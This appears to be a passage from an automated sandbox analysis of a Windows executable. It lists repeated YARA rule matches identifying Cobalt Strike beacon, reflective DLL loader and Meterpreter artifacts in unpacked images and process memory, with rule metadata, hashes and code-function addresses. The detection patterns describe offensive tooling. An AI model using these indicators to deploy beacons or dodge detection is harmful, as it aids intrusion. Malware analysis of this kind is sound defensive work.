          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike payload Author: ditekSHen
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00692078 CreateProcessWithLogonW
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001C5914
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001C1928
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001A916C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001C1264
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001CAAB0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001B0334
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001C0374
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001C239C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001CC397
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001BF5A8
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001CE600
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001ACE3C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001A9680
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001CC680
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001B6F38
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001CB7B0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_001CCFF0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_006801A8
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0066DA3C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0068F200
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0066A280
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0068D280
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00677B38
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0068DBF0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0068C3B0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00669D6C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00682528
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00686514
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00681E64
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0067867C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0068B6B0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00680F74
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00670F34
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00682F9C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_0068CF97
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
